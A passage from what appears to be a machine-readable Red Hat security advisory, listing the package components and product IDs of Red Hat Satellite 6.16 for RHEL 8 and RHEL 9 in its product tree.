"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch"
},
"product_reference": "satellite-0:6.16.12-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src"
},
"product_reference": "satellite-0:6.16.12-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-cli-0:6.16.12-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch"
},
"product_reference": "satellite-cli-0:6.16.12-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-common-0:6.16.12-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch"
},
"product_reference": "satellite-common-0:6.16.12-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch"
},
"product_reference": "scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "scap-security-guide-satellite-0:1.0.6-1.el8sat.src as a component of Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src"
},
"product_reference": "scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"relates_to_product_reference": "8Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch"
},
"product_reference": "foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src"
},
"product_reference": "openvox-agent-0:8.24.1-3.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64"
},
"product_reference": "openvox-agent-0:8.24.1-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch"
},
"product_reference": "openvox-server-0:8.14.1-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src"
},
"product_reference": "openvox-server-0:8.14.1-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-0:12.3.0-1.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src"
},
"product_reference": "python-pillow-0:12.3.0-1.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64"
},
"product_reference": "python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pulp-container-0:2.20.10-2.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src"
},
"product_reference": "python-pulp-container-0:2.20.10-2.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyjwt-0:2.13.0-1.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src"
},
"product_reference": "python-pyjwt-0:2.13.0-1.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pysequoia-0:0.1.33-1.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src"
},
"product_reference": "python-pysequoia-0:0.1.33-1.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-0:12.3.0-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64"
},
"product_reference": "python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
},
"product_reference": "python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pulp-container-0:2.20.10-2.el9pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch"
},
"product_reference": "python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch"
},
"product_reference": "python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt-0:2.13.0-1.el9pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch"
},
"product_reference": "python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64"
},
"product_reference": "python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src"
},
"product_reference": "satellite-0:6.16.12-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-capsule-0:6.16.12-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch"
},
"product_reference": "satellite-capsule-0:6.16.12-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-common-0:6.16.12-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch"
},
"product_reference": "satellite-common-0:6.16.12-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-capsule"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-maintenance"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-maintenance"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src"
},
"product_reference": "satellite-0:6.16.12-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16-utils"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-cli-0:6.16.12-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch"
},
"product_reference": "satellite-cli-0:6.16.12-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16-utils"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-1:3.12.0.8-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src"
},
"product_reference": "foreman-installer-1:3.12.0.8-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch"
},
"product_reference": "foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src"
},
"product_reference": "openvox-agent-0:8.24.1-3.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-agent-0:8.24.1-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64"
},
"product_reference": "openvox-agent-0:8.24.1-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch"
},
"product_reference": "openvox-server-0:8.14.1-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openvox-server-0:8.14.1-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src"
},
"product_reference": "openvox-server-0:8.14.1-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-0:12.3.0-1.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src"
},
"product_reference": "python-pillow-0:12.3.0-1.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64"
},
"product_reference": "python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pulp-container-0:2.20.10-2.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src"
},
"product_reference": "python-pulp-container-0:2.20.10-2.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyjwt-0:2.13.0-1.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src"
},
"product_reference": "python-pyjwt-0:2.13.0-1.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pysequoia-0:0.1.33-1.el9pc.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src"
},
"product_reference": "python-pysequoia-0:0.1.33-1.el9pc.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-0:12.3.0-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64"
},
"product_reference": "python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
},
"product_reference": "python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pulp-container-0:2.20.10-2.el9pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch"
},
"product_reference": "python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch"
},
"product_reference": "python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pyjwt-0:2.13.0-1.el9pc.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch"
},
"product_reference": "python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64"
},
"product_reference": "python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-faraday-0:1.10.6-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src"
},
"product_reference": "rubygem-faraday-0:1.10.6-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src"
},
"product_reference": "rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-katello-0:4.14.0.21-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch"
},
"product_reference": "rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-katello-0:4.14.0.21-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src"
},
"product_reference": "rubygem-katello-0:4.14.0.21-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64"
},
"product_reference": "rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64"
},
"product_reference": "rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch"
},
"product_reference": "satellite-0:6.16.12-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-0:6.16.12-1.el9sat.src as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src"
},
"product_reference": "satellite-0:6.16.12-1.el9sat.src",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-cli-0:6.16.12-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch"
},
"product_reference": "satellite-cli-0:6.16.12-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "satellite-common-0:6.16.12-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch"
},
"product_reference": "satellite-common-0:6.16.12-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch as a component of Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch"
},
"product_reference": "scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"relates_to_product_reference": "9Base-satellite-6.16"
},
{
"category": "default_component_of",
"full_product_name": {
